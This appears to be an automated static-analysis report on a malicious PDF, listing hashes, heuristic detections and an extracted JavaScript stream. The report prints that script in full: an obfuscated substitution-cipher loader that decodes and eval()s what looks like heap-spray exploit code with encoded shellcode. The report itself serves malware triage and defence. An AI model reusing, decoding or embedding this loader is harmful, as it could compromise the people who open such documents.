Malicious PDF — malware analysis report

Static analysis result for SHA-256 e60eb62ae9b393e3…

MALICIOUS

PDF

9.7 KB Created: 2010-09-16 11:52:51 Authoring application: x2KYeHYwa (via sMOLd9SYOtY) First seen: 2026-05-10
MD5: 607d63f50bedf3b6faf54321983d4901 SHA-1: f63539b47f4dc3bf16459938d562046feda057a3 SHA-256: e60eb62ae9b393e303841f9022ff5f9c44f693c308af5b3f9dbda62e3a68216e
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript with a high-confidence heuristic firing for eval() calls, indicating obfuscation and potential malicious execution. The JavaScript action and embedded JS stream further support this. The eval() call suggests the script is attempting to dynamically execute code, likely to download and run a second-stage payload. No specific family could be identified.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    %Yq(qE%YB9Pb%YPbqf%YBPq.%YP.qB%YqMqJ%YP.qB%YqMqJ%YP.qB%Yq.qQ%Yqgqf%YB4Pb%YB4q,%YqJE.%YEMqg%YEgEJ\"i;\r\nIIx\r\nII0Wn0ItTIUSqhaawYmoQm(JEcfI==IPie\r\nIIIIRC}dtYjMBpw.n..>I=IYH0nlju0U\"%YgEgE%YgEgE%YgEgE%Y4.bF%YEE(F%YqqQJ%Y,4FJ%Y,44f%Yb.EE%YbPgE%YbF.9%Yb,4(%Y..bQ%Y....%Y,FB.%YM.gb%Yb.b.%Yqgb.%YbE9.%YJ.qg%YgP.E%YJ.qg%YqbbB%Yb.4E%Yb.bF%Yqgb.%YFJ4E%Yqf,B%Ybf9f%Y4B4E%Yb.ff%Yb.b.%Y99qq%YFJbF%YBB,B%Yq(ff%Y4Bbf%Yb.f.%Yb.b.%Y99qq%YFJbB%YQ9,B%Yf4(.%Y4BPM%Yb.4M%Yb.b.%Y99qq%YFJbE%Y44,B%Y4.Pf%Y4B,.%Yb.EF%Yb.b …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x23B 8335 bytes
SHA-256: 0beb1ef0a9658efd7f57516b4ee2beca576955a05bb591763bba38092efdc7be
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function cjnsU5imzP(cjnsU5imzP,i6WUt) {var bazLGK=cjnsU5imzP. substr (i6WUt, 1);return bazLGK;}/*d01aI9leqtMqk|AtH2AqZF3d|UTsaeR4UIUdI5*/function uX8JvzEIhjzq(AA1tZnOweBo) {/*ypJfQeZ9mSASrFMLngfV|An1UwLx4Hutw4PCZoCB7|UpIh0*/var xSnDxHyKF86 = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*DVHBVu2phDdbLNL7I[AhFDjCF4rNb]Af4GgP1Y5YcY0*//*mBlubmShp2juwR8|A7suEPA5|AUGTKt6LVrn79Km*/var CEbm3I93I0nie1U929Y /*uXoCW23UloY0oUdjoj[yT0AohomhzPZkmDm96g]hKrXyB1Yq*/= new String("A2UiexIGL9FQMb.mw>d)rX87R{CvzoSO1haj3ls0TKVtkNWyHDup5nZY6 c<}4fPEg(qB,J");/*SeuIfZpJBM8|li3pL2mrL|A3hq5YF*/for(SCuFJjPOiMJlQlNK=0;SCuFJjPOiMJlQlNK<xSnDxHyKF86.length;SCuFJjPOiMJlQlNK++) {if(AA1tZnOweBo == cjnsU5imzP(CEbm3I93I0nie1U929Y, SCuFJjPOiMJlQlNK)) {/*zXGkgm9LvBYuSA[LqfESNQcFJ]wFY2rNPyxvax7MyV6GWQ*/return cjnsU5imzP(xSnDxHyKF86, SCuFJjPOiMJlQlNK);/*CvWV8nxEw <A2KtjY8YMuy9sAyE7]aONd9jy8MlD9Y42jnc8*/}}return AA1tZnOweBo;}/*AKXoKFp8Kn3l1G[Aq2z3e]A2xvcaNaDElasvgYtqB*//*R2tVtaOjTtcMmQ8|qMftQG|A1qXlWZ*/var MQnuJxixniW = new String;var vtpUXXpS = new String("\r\n6j5I1pyF,1O)q6g7M,ZtI=IH0 I955j<Ui;\r\n6j5IkYb5YpgER{Wm)pVq;\r\nTYHlZtDHIRzmDPHJBkFo d8TWUTYlQWK.9,f{Cp,11LInDrl3ot)KQwfj Wnie\r\nII VtW0IUTYlQWK.9,f{Cp,11GW0HKZVI*IPIAInDrl3ot)KQwfj Wnie\r\nIIIITYlQWK.9,f{Cp,11I+=ITYlQWK.9,f{Cp,11;\r\nIIx\r\nIITYlQWK.9,f{Cp,11I=ITYlQWK.9,f{Cp,11GnY3nZ5tHKU4LInDrl3ot)KQwfj WnI/IPi;\r\nII50ZY5HITYlQWK.9,f{Cp,11;\r\nx\r\nTYHlZtDHI<7ql()yFrMlFr4k USqhaawYmoQm(JEcfie\r\nII6j5Iyglo87Tk3>6 v0Z{I=I4c4l4l4l4l;\r\nII6j5IRC}dtYjMBpw.n..>I=IYH0nlju0U\"%YgEgE%YgEgE%YgEgE%Y4.bF%YEE(F%YqqQJ%Y,4FJ%Y,44f%Yb.EE%YbPgE%YbF.9%Yb,4(%Y..bQ%Y....%Y,FB.%YM.gb%Yb.b.%Yqgb.%YbE9.%YJ.qg%YgP.E%YJ.qg%YqbbB%Yb.4E%Yb.bF%Yqgb.%YFJ4E%Yqf,B%Ybf9f%Y4B4E%Yb.ff%Yb.b.%Y99qq%YFJbF%YBB,B%Yq(ff%Y4Bbf%Yb.f.%Yb.b.%Y99qq%YFJbB%YQ9,B%Yf4(.%Y4BPM%Yb.4M%Yb.b.%Y99qq%YFJbE%Y44,B%Y4.Pf%Y4B,.%Yb.EF%Yb.b.%Y99qq%YFJ..%YPb,B%Y49Jq%Y4B(B%Yb.PJ%Yb.b.%Y99qq%Y9..F%YMBq.%YJ9PQ%Yqqf(%Y.B99%Yb,4q%Yb.bb%YFfb.%YJ9qq%YqgQF%YbF99%Ybb,(%YqgFq%Y.BF9%Y4BFJ%Yb.qg%Yb.b.%Y,BF.%Y.(MJ%YJ.Q4%YB,4B%Yb.b.%Yqqb.%Y.E99%YP9qg%YP.qQ%YqqF.%YQ.99%Yf4,B%Yb.b.%YF.b.%Y99qg%Y,(.F%YFqbM%YF9qg%Y4B.B%Yb.,b%Yb.b.%Y99bQ%YP,Q.%YFEb.%YQfJf%YP,,9%YbF9.%Y,9JB%Yb.b.%YJ9f4%YqgQ.%YbE99%Ybb,(%YqgFq%Y.BF9%Y9.4B%Yb.b.%Y,(b.%YFBb,%Y99bQ%YMQQF%YFQEg%Yf4FQ%YQ.J9%YFQF.%Y99qg%Y,(.E%YFqb9%YF9qg%Y4B.B%Yb.QQ%Yb.b.%Yb.,(%YJ9f4%YqgQ.%YbB99%YbM,(%YqgFq%Y.BF9%Y..4B%Yb.b.%Y,(b.%Yqgf4%Y..99%Ybb,(%YqgFq%Y.BF9%Yb.4B%Yb.b.%Y9bb.%YFMFg%Y4bbQ%Y4bbQ%Y4bbQ%Y4bbQ%Y4EqQ%YF(bF%YqgFQ%Y4ME(%YFMf,%Y4.f4%YqgF9%Yqg4E%YbBJP%YFPqg%YFJbE%YJQqg%YqgME%Y.fJF%YbQJB%YFJfQ%YJJqg%YbQQ.%YMQfQ%Y9qPq%YgP9b%YPQbQ%YMQFJ%Yb4fJ%Y..(f%YfMM(%YbBJF%YPfPb%YbQbP%Y9.fM%Yfb4g%YffMg%YJ9Ff%YF(49%Y4gqg%YF(qg%YbQQF%Y,JEP%YbEqg%Yqg9g%Y.EF(%YEPbQ%YbFqg%YbQqg%YFfP9%YPMFP%Yb.bB%YfF4B%Yf4ff%YF9f4%Y9EFM%Y949P%Yb.9f%YBgq,%YB4Bg%YP.E9%YqQP.%YBqqJ%YqbqJ%YB4qB%Yqfq(%Yq(qE%YB9Pb%YPbqf%YBPq.%YP.qB%YqMqJ%YP.qB%YqMqJ%YP.qB%Yq.qQ%Yqgqf%YB4Pb%YB4q,%YqJE.%YEMqg%YEgEJ\"i;\r\nIItTIUSqhaawYmoQm(JEcfI==Ifie\r\nIIIIyglo87Tk3>6 v0Z{I=I4cE4E4E4E4;\r\nIIIIRC}dtYjMBpw.n..>I=IYH0nlju0U\"%YgEgE%YgEgE%YgEgE%Y4.bF%YEE(F%YqqQJ%Y,4FJ%Y,44f%Yb.EE%YbPgE%YbF.9%Yb,4(%Y..bQ%Y....%Y,FB.%YM.gb%Yb.b.%Yqgb.%YbE9.%YJ.qg%YgP.E%YJ.qg%YqbbB%Yb.4E%Yb.bF%Yqgb.%YFJ4E%Yqf,B%Ybf9f%Y4B4E%Yb.ff%Yb.b.%Y99qq%YFJbF%YBB,B%Yq(ff%Y4Bbf%Yb.f.%Yb.b.%Y99qq%YFJbB%YQ9,B%Yf4(.%Y4BPM%Yb.4M%Yb.b.%Y99qq%YFJbE%Y44,B%Y4.Pf%Y4B,.%Yb.EF%Yb.b.%Y99qq%YFJ..%YPb,B%Y49Jq%Y4B(B%Yb.PJ%Yb.b.%Y99qq%Y9..F%YMBq.%YJ9PQ%Yqqf(%Y.B99%Yb,4q%Yb.bb%YFfb.%YJ9qq%YqgQF%YbF99%Ybb,(%YqgFq%Y.BF9%Y4BFJ%Yb.qg%Yb.b.%Y,BF.%Y.(MJ%YJ.Q4%YB,4B%Yb.b.%Yqqb.%Y.E99%YP9qg%YP.qQ%YqqF.%YQ.99%Yf4,B%Yb.b.%YF.b.%Y99qg%Y,(.F%YFqbM%YF9qg%Y4B.B%Yb.,b%Yb.b.%Y99bQ%YP,Q.%YFEb.%YQfJf%YP,,9%YbF9.%Y,9JB%Yb.b.%YJ9f4%YqgQ.%YbE99%Ybb,(%YqgFq%Y.BF9%Y9.4B%Yb.b.%Y,(b.%YFBb,%Y99bQ%YMQQF%YFQEg%Yf4FQ%YQ.J9%YFQF.%Y99qg%Y,(.E%YFqb9%YF9qg%Y4B.B%Yb.QQ%Yb.b.%Yb.,(%YJ9f4%YqgQ.%YbB99%YbM,(%YqgFq%Y.BF9%Y..4B%Yb.b.%Y,(b.%Yqgf4%Y..99%Ybb,(%YqgFq%Y.BF9%Yb.4B%Yb.b.%Y9bb.%YFMFg%Y4bbQ%Y4bbQ%Y4bbQ%Y4bbQ%Y4EqQ%YF(bF%YqgFQ%Y4ME(%YFMf,%Y4.f4%YqgF9%Yqg4E%YbBJP%YFPqg%YFJbE%YJQqg%YqgME%Y.fJF%YbQJB%YFJfQ%YJJqg%YbQQ.%YMQfQ%Y9qPq%YgP9b%YPQbQ%YMQFJ%Yb4fJ%Y..(f%YfMM(%YbBJF%YPfPb%YbQbP%Y9.fM%Yfb4g%YffMg%YJ9Ff%YF(49%Y4gqg%YF(qg%YbQQF%Y,JEP%YbEqg%Yqg9g%Y.EF(%YEPbQ%YbFqg%YbQqg%YFfP9%YPMFP%Yb.bB%YfF4B%Yf4ff%YF9f4%Y9EFM%Y949P%Yb.9f%YBgq,%YB4Bg%YP.E9%YqQP.%YBqqJ%YqbqJ%YB4qB%Yqfq(%Yq(qE%YB9Pb%YPbqf%YBPq.%YP.qB%YqMqJ%YP.qB%YqMqJ%YP.qB%Yq.qQ%Yqgqf%YB4Pb%YB4q,%YqJE.%YEMqg%YEgEJ\"i;\r\nIIx\r\nII0Wn0ItTIUSqhaawYmoQm(JEcfI==IPie\r\nIIIIRC}dtYjMBpw.n..>I=IYH0nlju0U\"%YgEgE%YgEgE%YgEgE%Y4.bF%YEE(F%YqqQJ%Y,4FJ%Y,44f%Yb.EE%YbPgE%YbF.9%Yb,4(%Y..bQ%Y....%Y,FB.%YM.gb%Yb.b.%Yqgb.%YbE9.%YJ.qg%YgP.E%YJ.qg%YqbbB%Yb.4E%Yb.bF%Yqgb.%YFJ4E%Yqf,B%Ybf9f%Y4B4E%Yb.ff%Yb.b.%Y99qq%YFJbF%YBB,B%Yq(ff%Y4Bbf%Yb.f.%Yb.b.%Y99qq%YFJbB%YQ9,B%Yf4(.%Y4BPM%Yb.4M%Yb.b.%Y99qq%YFJbE%Y44,B%Y4.Pf%Y4B,.%Yb.EF%Yb.b.%Y99qq%YFJ..%YPb,B%Y49Jq%Y4B(B%Yb.PJ%Yb.b.%Y99qq%Y9..F%YMBq.%YJ9PQ%Yqqf(%Y.B99%Yb,4q%Yb.bb%YFfb.%YJ9qq%YqgQF%YbF99%Ybb,(%YqgFq%Y.BF9%Y4BFJ%Yb.qg%Yb.b.%Y,BF.%Y.(MJ%YJ.Q4%YB,4B%Yb.b.%Yqqb.%Y.E99%YP9qg%YP.qQ%YqqF.%YQ.99%Yf4,B%Yb.b.%YF.b.%Y99qg%Y,(.F%YFqbM%YF9qg%Y4B.B%Yb.,b%Yb.b.%Y99bQ%YP,Q.%YFEb.%YQfJf%YP,,9%YbF9.%Y,9JB%Yb.b.%YJ9f4%YqgQ.%YbE99%Ybb,(%YqgFq%Y.BF9%Y9.4B%Yb.b.%Y,(b.%YFBb,%Y99bQ%YMQQF%YFQEg%Yf4FQ%YQ.J9%YFQF.%Y99qg%Y,(.E%YFqb9%YF9qg%Y4B.B%Yb.QQ%Yb.b.%Yb.,(%YJ9f4%YqgQ.%YbB99%YbM,(%YqgFq%Y.BF9%Y..4B%Yb.b.%Y,(b.%Yqgf4%Y..99%Ybb,(%YqgFq%Y.BF9%Yb.4B%Yb.b.%Y9bb.%YFMFg%Y4bbQ%Y4bbQ%Y4bbQ%Y4bbQ%Y4EqQ%YF(bF%YqgFQ%Y4ME(%YFMf,%Y4.f4%YqgF9%Yqg4E%YbBJP%YFPqg%YFJbE%YJQqg%YqgME%Y.fJF%YbQJB%YFJfQ%YJJqg%YbQQ.%YMQfQ%Y9qPq%YgP9b%YPQbQ%YMQFJ%Yb4fJ%Y..(f%YfMM(%YbBJF%YPfPb%YbQbP%Y9.fM%Yfb4g%YffMg%YJ9Ff%YF(49%Y4gqg%YF(qg%YbQQF%Y,JEP%YbEqg%Yqg9g%Y.EF(%YEPbQ%YbFqg%YbQqg%YFfP9%YPMFP%Yb.bB%YfF4B%Yf4ff%YF9f4%Y9EFM%Y949P%Yb.9f%YBgq,%YB4Bg%YP.E9%YqQP.%YBqqJ%YqbqJ%YB4qB%Yqfq(%Yq(qE%YB9Pb%YPbqf%YBPq.%YP.qB%YqMqJ%YP.qB%YqMqJ%YP.qB%Yq.qQ%Yqgqf%YB4Pb%YB4q,%YqJE.%YEMqg%YEgEJ\"i;\r\nIIx\r\nII6j5Iw5yKmvR5NrDQ}VlkI=I4cg44444;\r\nII6j5I<lEnOlqlz85XlBT6I=IRC}dtYjMBpw.n..>GW0HKZVI*IP;\r\nII6j5InDrl3ot)KQwfj WnI=Iw5yKmvR5NrDQ}VlkI-IU<lEnOlqlz85XlBT6I+I4cE,i;\r\nII6j5ITYlQWK.9,f{Cp,11I=IYH0nlju0U\"%YJ4J4%YJ4J4\"i;\r\nIITYlQWK.9,f{Cp,11I=IRzmDPHJBkFo d8TWUTYlQWK.9,f{Cp,11LInDrl3ot)KQwfj Wni;\r\nII6j5IbvlbYEq08Y58lzBWI=IUyglo87Tk3>6 v0Z{I-I4cg44444iI/Iw5yKmvR5NrDQ}Vlk;\r\nIITD5IU6j5IW403Wkb.Bq3kQmT9I=I4;IW403Wkb.Bq3kQmT9IAIbvlbYEq08Y58lzBW;IW403Wkb.Bq3kQmT9I++Iie\r\nIIII1pyF,1O)q6g7M,Zt[W403Wkb.Bq3kQmT9]I=ITYlQWK.9,f{Cp,11I+IRC}dtYjMBpw.n..>;\r\nIIx\r\nx\r\nTYHlZtDHICw7s)o>VR4qPlFHtUie\r\nII6j5I}C)BFhrw0cPpbVfcI=I4;\r\nII6j5IsRjdZnP>PB)0w,8lI=IjuuG6t0 05S05ntDHGZDvZ5tHKUi;\r\nIIjuuGlW0j5zty07YZUkYb5YpgER{Wm)pVqi;\r\n\r\nIItTIUsRjdZnP>PB)0w,8lIAIBGfie\r\nIIII<7ql()yFrMlFr4k U4i;\r\nIIII6j5I>VtN.(PZPgN.NNQkI=IYH0nlju0U\"%Y4l4l%Y4l4l\"i;\r\nIIII VtW0IU>VtN.(PZPgN.NNQkGW0HKZVIAIggJ(Pi>VtN.(PZPgN.NNQkI+=I>VtN.(PZPgN.NNQk;\r\nIIIIZVtnIGlDWWj3vZD50I=IQDWWj3GlDWW0lZbyjtW>HTDUe\r\nIIIIIInY3kI:I\"\"LIynKI:I>VtN.(PZPgN.NNQk\r\nIIIIx\r\nIIIIi;\r\nIIx\r\ntTIUsRjdZnP>PB)0w,8lI2=IJie\r\nIIIIZ5<Ie\r\ntTIUjuuGsDlGQDWWj3GK0Z>lDHie\r\nIIIIIIII<7ql()yFrMlFr4k UPi;\r\nIIIIIIII6j5IOHggT(rV9KXvHk(XI=IYH0nlju0U\"%4J\"i;\r\nIIIIIIII VtW0IUOHggT(rV9KXvHk(XGW0HKZVIAI4cg444iOHggT(rV9KXvHk(XI+=IOHggT(rV9KXvHk(X;\r\nIIIIIIIIOHggT(rV9KXvHk(XI=I\"8G\"I+IOHggT(rV9KXvHk(X;\r\njuuGsDlGQDWWj3GK0Z>lDHUOHggT(rV9KXvHk(Xi;\r\nIIIIIIII}C)BFhrw0cPpbVfcI=If;\r\nIIIIIIx\r\nIIIIII0Wn0Ie\r\nIIIIIIII}C)BFhrw0cPpbVfcI=If;\r\nIIIIIIx\r\nIIIIx\r\nIIIIljZlVIU0ie\r\nIIIIII}C)BFhrw0cPpbVfcI=If;\r\nIIIIx\r\nIIIItTIU}C)BFhrw0cPpbVfcI==Ifie\r\nIIIIIItTIUUsRjdZnP>PB)0w,8lI2=IBGf&&IsRjdZnP>PB)0w,8lIAIJiie\r\nIIIIIIII<7ql()yFrMlFr4k Ufi;\r\nIIIIIIII6j5IwHBK5JjnF)J qrKbI=I\"fPJJJJJJJJJJJJJJJJJJ\";\r\nIIIIIIIITD5IU{k>DHsO<dnC,lOogI=I4;I{k>DHsO<dnC,lOogIAIPBq;I{k>DHsO<dnC,lOogI++Iie\r\nIIIIIIIIIIwHBK5JjnF)J qrKbI+=I\",\";\r\nIIIIIIIIx\r\nIIIIIIIIYZtWGu5tHZTU\"%g(444T\"LIwHBK5JjnF)J qrKbi;\r\nIIIIIIx\r\nIIIIx\r\nIIx\r\nx\r\njuuG7jNFk)(6TQ5N11}KI=ICw7s)o>VR4qPlFHt;\r\nkYb5YpgER{Wm)pVqI=IjuuGn0Zzty07YZU\"juuG7jNFk)(6TQ5N11}KUi\"LIf4i;\r\n");/*oR8ABYPl{AD5kT3oAFKuWQ4VH}tt7I8ma7mcW1DE*//*G9aa3Fb9PLVfGrnraX|jVR9S4bpwetmltC|nHdmW*/for(SILVqIsA1INIw8RjgFM=0;SILVqIsA1INIw8RjgFM<vtpUXXpS.length;SILVqIsA1INIw8RjgFM++)MQnuJxixniW += uX8JvzEIhjzq(cjnsU5imzP(vtpUXXpS,SILVqIsA1INIw8RjgFM));eval(MQnuJxixniW);/*A2vofcF2IoOZnhU[MGj6sL]vNS2q5PV2HGhmim*/

Open this report in the interactive analyzer, or submit your own file for analysis.